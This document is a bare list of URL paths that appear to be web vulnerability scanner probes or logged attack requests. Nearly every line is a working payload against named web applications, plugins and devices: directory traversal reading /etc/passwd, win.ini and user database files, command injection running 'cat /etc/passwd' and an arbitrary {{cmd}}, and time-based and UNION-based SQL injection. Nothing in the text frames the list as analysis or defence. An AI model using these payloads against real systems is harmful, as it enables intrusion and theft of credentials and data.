/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22
/webadmin/clientlogin/?srid=&action=showdeny&url=
/services/getFile.cmd?userfile=config.xml
/rest/v1/AccountService/Accounts
/CMSInstall/install.aspx
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/html/log
/../../etc/passwd
/filemanager/upload.php
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/wp-admin/options-general.php?page=smartcode
/user/scripts/login_par.js
/device.rsp?opt=user&cmd=list
/pages/systemcall.php?command=cat%20/etc/passwd
/cgi-bin/file_transfer.cgi
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/dashboard/view-chair-list.php?table_id=
/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1
/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
